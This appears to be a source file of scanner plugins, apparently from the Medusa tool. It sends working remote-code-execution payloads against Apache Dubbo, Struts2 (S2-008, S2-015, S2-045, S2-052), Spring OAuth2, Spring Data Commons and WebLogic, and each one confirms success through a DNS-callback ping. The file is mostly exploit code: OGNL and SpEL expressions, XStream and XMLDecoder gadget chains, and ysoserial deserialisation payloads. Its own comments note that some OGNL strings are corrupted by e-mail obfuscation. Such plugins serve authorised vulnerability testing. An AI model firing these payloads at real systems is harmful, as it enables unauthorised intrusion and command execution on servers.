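        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)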
def medusa(**kwargs) -> None:
    """Probe for CVE-2020-1948 (Apache Dubbo provider deserialisation).

    Builds a ``ToStringBean`` wrapping a ``JdbcRowSetImpl`` whose
    ``dataSource`` is ``ldap://<dnslog>`` and sends it as the argument of a
    ``$invoke`` call to the sample ``DemoService``.  A vulnerable provider
    deserialises the argument and performs the JNDI lookup, which resolves
    the DNSLog name; only that DNS hit is used as evidence.

    Practitioner notes:
      * the service name is the hard-coded sample
        ``org.apache.dubbo.spring.boot.sample.consumer.DemoService``; the
        original author's comment says ``$invoke``/``$invokeSync``/``$echo``
        all work across 2.7.7 and the versions listed in the CVE.
      * ``port`` is only defaulted for http/https; for any other scheme with
        no explicit port ``int(port)`` raises and the error is logged.
      * no proxy support: the Dubbo connection goes directly to the target.
      * presumably ``DubboClient`` owns a socket; nothing here closes it —
        TODO confirm whether explicit cleanup is needed.

    Args:
        **kwargs: must contain ``Url``; the mapping is forwarded to
            VulnerabilityDetails.
    """
    Url = kwargs.get("Url")

    scheme, url, port = UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        DL = Dnslog()
        client = DubboClient(url, int(port))

        row_set = new_object('com.sun.rowset.JdbcRowSetImpl',
                             dataSource="ldap://" + DL.dns_host(),
                             strMatchColumns=["foo"])
        row_set_class = new_object(
            'java.lang.Class',
            name="com.sun.rowset.JdbcRowSetImpl",
        )
        gadget = new_object('com.rometools.rome.feed.impl.ToStringBean',
                            beanClass=row_set_class,
                            obj=row_set)

        resp = client.send_request_and_return_response(
            service_name=
            'org.apache.dubbo.spring.boot.sample.consumer.DemoService',
            method_name='$invoke',
            args=[gadget])
        # Give the provider time to resolve the LDAP host.
        time.sleep(3)
        if not DL.result():
            return
        Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(
            url, DL.dns_text(), DL.dns_host(), str(resp))
        info = VulnerabilityInfo(Medusa).info
        VulnerabilityDetails(info, "", **kwargs).Write()
        WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe for Struts2 S2-008 (OGNL via the ``debug=command`` developer mode).

    Appends ``?debug=command&expression=...`` to ``path``; the expression
    enables static method access and runs ``Runtime.exec("ping <dnslog>")``.
    The target is reported only when the DNSLog service records a lookup;
    the response body is attached to the report.

    Unlike the other S2 plugins the GET here is not wrapped: a request error
    (including a timeout) goes straight to the error log and the DNSLog poll
    is skipped.

    NOTE(review): the ``%[email protected]@getRuntime`` fragment in the payload looks
    like an e-mail-obfuscation artefact of the scraped copy of this file and
    is reproduced verbatim; restore it from upstream before use.

    Args:
        Url: target URL including the action path.
        RandomAgent: User-Agent string for the probe request.
        proxies: optional proxy spec normalised by ``Proxies().result``.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = Proxies().result(proxies)

    scheme, url, port, path = UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    DL = Dnslog()
    debug_query = """?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%[email protected]@getRuntime%28%29.exec%28%22ping%20{}%22%29)""".format(
        DL.dns_host())
    try:
        payload_url = "{}://{}:{}{}{}".format(scheme, url, port, path, debug_query)
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }

        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        # Allow the target's DNS lookup to reach the DNSLog service.
        time.sleep(3)
        if not DL.result():
            return
        Medusa = "{} 存在Struts2远程代码执行漏洞(S2-008)\r\n漏洞详情:\r\n版本号:S2-008\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
            url, payload_url, con, DL.dns_text(), DL.dns_host())
        info = VulnerabilityInfo(Medusa).info
        VulnerabilityDetails(info, url, **kwargs).Write()
        WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
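def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Probe for CVE-2018-2628 (WebLogic WLS core deserialisation) via ``exploit``.

    This plugin cannot hand a proxy dict to ``requests``: when ``proxies``
    is given it is parsed with UrlProcessing and installed as the PySocks
    default proxy by monkey-patching ``socket.socket``, so the raw sockets
    opened inside ``exploit`` go through it.

    Security/operational notes:
      * the ``socket.socket`` patch is process-global and affects every
        thread.  The original never undid it, so every later plugin (and any
        traffic meant to go direct) silently went through the proxy; it is
        now restored in ``finally``.  This is still not safe with concurrent
        plugins — a per-connection proxy inside ``exploit`` is the proper fix.
      * the proxy port parsed from ``proxies`` may be ``None`` when the proxy
        URL carries no port; PySocks is handed it unchanged, as before.
      * ``exploit`` receives a scratch path under GetTempFilePath(); nothing
        here removes it afterwards.

    Args:
        Url: target URL; scheme/host/port split by UrlProcessing.
        RandomAgent: unused; kept for the common plugin signature.
        proxies: optional proxy URL, used as a PySocks ``socks.HTTP`` proxy.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80

    original_socket = socket.socket
    if proxies is not None:
        proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(
            proxies)
        socks.set_default_proxy(socks.HTTP,
                                addr=proxies_url,
                                port=proxies_port)
        socket.socket = socks.socksocket  # route exploit()'s sockets via the proxy
    try:
        DL = Dnslog()
        JrmpPort = "2000"  # arbitrary; only has to be free on the scanner side
        JrmpClient = "JRMPClient"
        YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
        TempPath = GetTempFilePath().Result() + str(int(
            time.time())) + "_" + randoms().result(10)
        con, payload = exploit(url, port, YsoserialPath, DL.dns_host(),
                               JrmpPort, JrmpClient, TempPath)
        # Wait for the deserialised ping to reach the DNSLog service.
        time.sleep(5)
        if DL.result():
            Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞(CVE-2018-2628)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format(
                url, payload, con, DL.dns_host(), DL.dns_text())
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))  # url doubles as the result file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)
    finally:
        # Undo the process-global monkey-patch whether or not exploit() raised.
        socket.socket = original_socket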
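def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Probe for the Spring Security OAuth2 SpEL injection (CVE-2018-1260 family).

    One GET is sent to ``/oauth/authorize`` with a SpEL expression in the
    ``scope`` parameter that calls ``Runtime.exec("ping <dnslog host>")``.
    The target is reported only when the DNSLog service records a lookup;
    the response body is attached to the report but not used as evidence.

    Change relative to the original: the error handler called
    ``ErrorLog().Write(url, _)``, i.e. it logged the plugin name in place of
    the exception and dropped the exception itself.  It now logs
    ``"Plugin Name:<plugin> || Target Url:<url>"`` together with ``e`` like
    every sibling plugin.

    Practitioner note: ``ping`` is started without a count; on a Linux
    target it will not exit on its own.

    Args:
        Url: target base URL; split into scheme/host/port by UrlProcessing.
        RandomAgent: User-Agent string for the probe request.
        proxies: optional proxy spec normalised by ``Proxies().result``.
        **kwargs: forwarded to VulnerabilityDetails.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        DL = Dnslog()
        payload = "/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(
            DL.dns_host())
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        resp = requests.get(payload_url,
                            headers=headers,
                            proxies=proxies,
                            timeout=6,
                            verify=False)
        # Allow the target's DNS lookup to reach the DNSLog service.
        time.sleep(4)
        if DL.result():
            Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(
                url, resp.text, DL.dns_host(), str(DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))  # url doubles as the result file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)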
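def medusa(**kwargs) -> None:
    """Probe for Struts2 S2-045 (OGNL in the ``Content-Type`` header).

    POSTs to ``Url`` with a ``Content-Type`` header that the Jakarta
    multipart parser evaluates as OGNL; the expression runs
    ``ping <dnslog>`` through ProcessBuilder.  The target is reported only
    if the DNSLog service records a lookup; the request headers and the
    response body are attached to the report.

    Changes relative to the original:
      * ``global resp`` is gone.  If the POST raised, the report line
        ``resp.request.headers`` either failed with NameError or, worse,
        reused a Response left over from a previous target; the headers we
        actually sent are used as the fallback now.
      * ``Headers`` is copied before ``Content-Type`` is overwritten, so the
        caller's dict (shared with other plugins) does not keep carrying the
        OGNL header.
      * the bare ``except:`` (which also swallowed KeyboardInterrupt) now
        catches ``requests.RequestException`` only.

    NOTE(review): the ``[email protected]`` fragment inside the OGNL is an
    e-mail-obfuscation artefact of the scraped copy of this file and is
    reproduced verbatim; restore the expression from upstream before use.

    Args:
        **kwargs: ``Url``, ``Headers`` (not mutated) and ``Proxies``; the
            mapping is forwarded to VulnerabilityDetails.
    """
    url = kwargs.get("Url")
    Headers = kwargs.get("Headers")
    proxies = kwargs.get("Proxies")
    DL = Dnslog()
    con = ""
    resp = None
    try:
        payload_url = url

        req_headers = dict(Headers or {})
        req_headers[
            "Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping " + DL.dns_host(
            ) + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

        try:
            resp = requests.post(payload_url,
                                 headers=req_headers,
                                 timeout=6,
                                 proxies=proxies,
                                 verify=False)
            con = resp.text
        except requests.RequestException:
            # Expected when the target's ping holds the response open past
            # our timeout; the DNS callback is the real signal, keep going.
            pass

        time.sleep(2)
        if DL.result():
            sent_headers = resp.request.headers if resp is not None else req_headers
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
                url, sent_headers, con, DL.dns_text(), DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            # Original passed the Response; fall back to url (what the other
            # plugins pass) when the request never completed.
            VulnerabilityDetails(_t.info, resp if resp is not None else url,
                                 **kwargs).Write()
            WriteFile().result(str(url), str(Medusa))  # url doubles as the result file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)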
def medusa(**kwargs)->None:
    """Probe for Spring Data Commons RCE (CVE-2018-1273) via an out-of-band DNS callback.

    Keyword args read: ``Url`` (target base URL, used as-is), ``Headers``
    (request header dict, mutated in place) and ``Proxies``; all kwargs
    are also forwarded to ``VulnerabilityDetails``.  A form field whose
    name is an expression chain (``#this.getClass()...exec("ping ...")``)
    is POSTed to ``/users``; the finding is recorded only if
    ``Dnslog.result()`` reports a resolution hit, so a target without
    outbound DNS will not be flagged.  Exceptions go to
    ``ErrorHandling``/``ErrorLog``.  Returns None.
    """
    url = kwargs.get("Url")  # target base URL supplied by the caller
    Headers = kwargs.get("Headers")  # caller-supplied request headers
    proxies = kwargs.get("Proxies")  # caller-supplied proxy settings
    try:

        DL=Dnslog()
        # The Dnslog host is the ping target: a DNS lookup is the only success signal,
        # the HTTP response body is merely echoed into the report.
        data="""username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx"""%DL.dns_host()
        payload ="/users?page=&size=5"
        payload_url = url + payload

        # NOTE: these writes mutate the caller's Headers dict, not a copy.
        Headers["Content-Type"]="application/x-www-form-urlencoded"
        Headers["Referer"]=payload_url

        # verify=False disables TLS certificate validation for this request.
        resp = requests.post(payload_url,data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)
        time.sleep(4)  # allow time for the out-of-band lookup to reach the Dnslog service
        if DL.result():
            Medusa = "{}存在SpringDataCommons远程命令执行漏洞(CVE-2018-1273)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # record the target and the scan evidence
            WriteFile().result(str(url),str(Medusa))# write to file: url is the per-target filename, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # NOTE(review): if `url` or `_` is None the concatenation below raises inside the
        # handler and the TypeError escapes this function unlogged.
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# log the failure against the plugin name
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
    """Probe for the Dubbo HTTP deserialization issue (CVE-2019-17564) via a DNS callback.

    Args:
        Url: target URL; scheme, host and port are split out by UrlProcessing.
        RandomAgent: User-Agent value to send.
        proxies: proxy setting, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails.

    A serialized object stream produced by ``generate_payload`` (ysoserial,
    ``CommonsCollections4``) is POSTed to the DemoService path; a finding is
    recorded only if Dnslog observed the callback, so hosts without outbound
    DNS will not be flagged.  Exceptions are logged via ErrorHandling/ErrorLog.
    Returns None.
    """
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        con=""  # response body; stays empty if the POST itself fails
        payload = '/org.apache.dubbo.samples.http.api.DemoService'
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        DL=Dnslog()
        JrmpClient = "CommonsCollections4"
        YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar"
        TempPath=GetTempFilePath().Result()+str(int(time.time()))+"_"+randoms().result(10)
        # generate_payload is defined elsewhere; presumably it runs ysoserial.jar with the
        # gadget name and the ping command and stages output under TempPath — confirm.
        data=generate_payload(YsoserialPath, "ping "+DL.dns_host(), JrmpClient,TempPath)
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # Inner try: a timed-out or failed POST is swallowed so the DNS check below still runs.
        # verify=False disables TLS certificate validation for this request.
        try:
            resp = requests.post(payload_url,data=data,headers=headers, proxies=proxies, timeout=6, verify=False)
            con = resp.text
        except:
            pass
        # NOTE(review): unlike the sibling plugins there is no sleep before DL.result(),
        # so a slow callback may be missed (false negative).
        if DL.result():
            Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2019-17564)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(url,DL.dns_text(),DL.dns_host(),con)
            print(Medusa)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # record the target and the scan evidence
            WriteFile().result(str(url),str(Medusa))# write to file: url is the per-target filename, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)  # log the failure with the URL and plugin name
def medusa(**kwargs)->None:
    """Probe for Struts2 S2-015 via an out-of-band DNS callback.

    Keyword args read: ``Url`` (target base URL, used as-is), ``Headers``
    and ``Proxies``; all kwargs are also forwarded to
    ``VulnerabilityDetails``.  A URL-encoded OGNL expression ending in
    ``.action`` is appended to the URL and fetched with GET; the finding is
    recorded only if Dnslog observed the resulting ``ping`` lookup, so a
    target without outbound DNS will not be flagged.  Returns None.
    """
    url = kwargs.get("Url")  # target base URL supplied by the caller
    Headers = kwargs.get("Headers")  # caller-supplied request headers
    proxies = kwargs.get("Proxies")  # caller-supplied proxy settings
    DL=Dnslog()
    con=""  # response body; stays empty if the GET itself fails
    # NOTE(review): the `[email protected]` fragments in this literal look like an
    # extraction artifact (e-mail obfuscation), not valid OGNL; the string as shown cannot be
    # assumed to match the project's original.
    payload="""%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29.getInputStream%28%29%29%2C%23q%7D.action""".format(DL.dns_host())
    try:
        payload_url = url+payload


        # Inner try: a timed-out or failed GET is swallowed so the DNS check below still runs
        # (original comment: avoid losing the finding when the POC hangs on Linux).
        # verify=False disables TLS certificate validation for this request.
        try:
            resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)
            con = resp.text
        except:
            pass

        time.sleep(2)  # allow time for the out-of-band lookup to reach the Dnslog service
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-015)\r\n漏洞详情:\r\n版本号:S2-015\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host())
            _t=VulnerabilityInfo(Medusa)
            # NOTE(review): if the inner GET raised, `resp` is unbound here and this line
            # raises NameError, which the outer handler logs as a plugin error.
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # record the target and the scan evidence
            WriteFile().result(str(url),str(Medusa))# write to file: url is the per-target filename, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# log the failure against the plugin name
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Probe for Struts2 S2-052 via an out-of-band DNS callback.

    Args:
        Url: target URL; scheme, host, port and path are split out by UrlProcessing.
        Headers: request headers to send as given.
        proxies: proxy setting, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails.

    An XML object graph whose ``java.lang.ProcessBuilder`` node runs ``ping``
    against the Dnslog host is POSTed to the URL's own path; a finding is
    recorded only if Dnslog observed the lookup, so a target without outbound
    DNS will not be flagged.  Exceptions are logged via ErrorHandling/ErrorLog.
    Returns None.
    """

    proxies=Proxies().result(proxies)

    # NOTE(review): a 4-tuple is unpacked here while sibling plugins unpack 3 values from
    # UrlProcessing().result(); confirm which signature the project actually ships.
    scheme, url, port,path = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    DL=Dnslog()
    con=""  # response body; stays empty if the POST itself fails
    data="""<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>ping</string>
                        <string>{}</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>""".format(DL.dns_host())
    try:
        # No fixed endpoint here: the request goes to whatever path the caller's Url carried.
        payload_url = scheme + "://" + url +":"+ str(port)+path



        # Inner try: a timed-out or failed POST is swallowed so the DNS check below still runs
        # (original comment: avoid losing the finding when the POC hangs on Linux).
        # verify=False disables TLS certificate validation for this request.
        try:
            resp = requests.post(payload_url,headers=Headers,data=data, timeout=6,proxies=proxies, verify=False)
            con = resp.text
        except:
            pass
        # NOTE(review): no sleep before DL.result() here, unlike the sibling plugins;
        # a slow callback may be missed.
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-052)\r\n漏洞详情:\r\n版本号:S2-052\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,data,con,DL.dns_text(),DL.dns_host())
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # record the target and the scan evidence
            WriteFile().result(str(url),str(Medusa))# write to file: url is the per-target filename, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# log the failure against the plugin name
def medusa(**kwargs)->None:
    """Probe for Spring Security OAuth2 RCE (CVE-2018-1260) via an out-of-band DNS callback.

    Keyword args read: ``Url`` (target base URL, used as-is), ``Headers``
    and ``Proxies``; all kwargs are also forwarded to
    ``VulnerabilityDetails``.  A GET to ``/oauth/authorize`` carries a
    ``scope`` parameter holding a URL-encoded expression that runs ``ping``
    against the Dnslog host; the finding is recorded only if Dnslog observed
    the lookup, so a target without outbound DNS will not be flagged.
    Exceptions go to ``ErrorHandling``/``ErrorLog``.  Returns None.
    """
    url = kwargs.get("Url")  # target base URL supplied by the caller
    Headers = kwargs.get("Headers")  # caller-supplied request headers
    proxies = kwargs.get("Proxies")  # caller-supplied proxy settings
    try:

        DL=Dnslog()
        payload ="/oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22ping%20{}%22%29%7D".format(DL.dns_host())
        payload_url = url + payload
        # verify=False disables TLS certificate validation for this request.
        resp = requests.get(payload_url,headers=Headers, proxies=proxies, timeout=6, verify=False)
        time.sleep(4)  # allow time for the out-of-band lookup to reach the Dnslog service
        if DL.result():
            Medusa = "{}存在SpringSecurityOauth2远程代码执行漏洞(CVE-2018-1260)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # record the target and the scan evidence
            WriteFile().result(str(url),str(Medusa))# write to file: url is the per-target filename, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # NOTE(review): if `url` or `_` is None the concatenation below raises inside the
        # handler and the TypeError escapes this function unlogged.
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# log the failure against the plugin name
def medusa(**kwargs)->None:
    """Probe for WebLogic XMLDecoder deserialization (CVE-2017-10271) via a DNS callback.

    Keyword args read: ``Url`` (target base URL, used as-is), ``Headers``
    (request header dict, mutated in place) and ``Proxies``; all kwargs are
    also forwarded to ``VulnerabilityDetails``.  Two SOAP envelopes (a
    Linux and a Windows ``ProcessBuilder`` variant) are POSTed in turn to
    ``/wls-wsat/CoordinatorPortType``; each ends with ``ping`` against the
    same Dnslog host, and a finding is recorded whenever
    ``Dnslog.result()`` reports a lookup, so a target without outbound DNS
    will not be flagged.  Errors are handled per variant.  Returns None.
    """
    url = kwargs.get("Url")  # target base URL supplied by the caller
    Headers = kwargs.get("Headers")  # caller-supplied request headers
    proxies = kwargs.get("Proxies")  # caller-supplied proxy settings
    DL = Dnslog()
    # ProcessBuilder argv: the command slot only carries a ping to the Dnslog host (the detection canary).
    linux_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping {}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(DL.dns_host())
    windows_data='''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0">
                <string>C:\Windows\System32\cmd.exe</string>
              </void>
              <void index="1">
                <string>/c</string>
              </void>
              <void index="2">
                <string>ping {}</string>
              </void>
            </array>
          <void method="start"/></void>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
'''.format(DL.dns_host())
    # Both variants share one Dnslog token, so a hit from the first body is still
    # reported (again) on the second iteration; there is no break after a finding.
    for data in [linux_data, windows_data]:
        try:
            payload = '/wls-wsat/CoordinatorPortType'
            payload_url = url+ payload

            # NOTE: this write mutates the caller's Headers dict, not a copy.
            Headers["Content-Type"]="text/xml"

            # verify=False disables TLS certificate validation for this request.
            resp = requests.post(payload_url,headers=Headers,data=data, proxies=proxies, timeout=6, verify=False)
            con = resp.text
            time.sleep(4)  # allow time for the out-of-band lookup to reach the Dnslog service
            if DL.result():
                Medusa = "{}存在WebLogicXMLDecoder反序列化漏洞(CVE-2017-10271)\r\n验证数据:\r\n漏洞位置:{}\r\n利用POC:{}\r\n返回数据包:{}\r\nDNSlog数据:{}\r\nDNSlog随机数:{}\r\n".format(url, payload_url,data, con,DL.dns_text(),DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # record the target and the scan evidence
                WriteFile().result(str(url),str(Medusa))# write to file: url is the per-target filename, Medusa the result text
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, _)
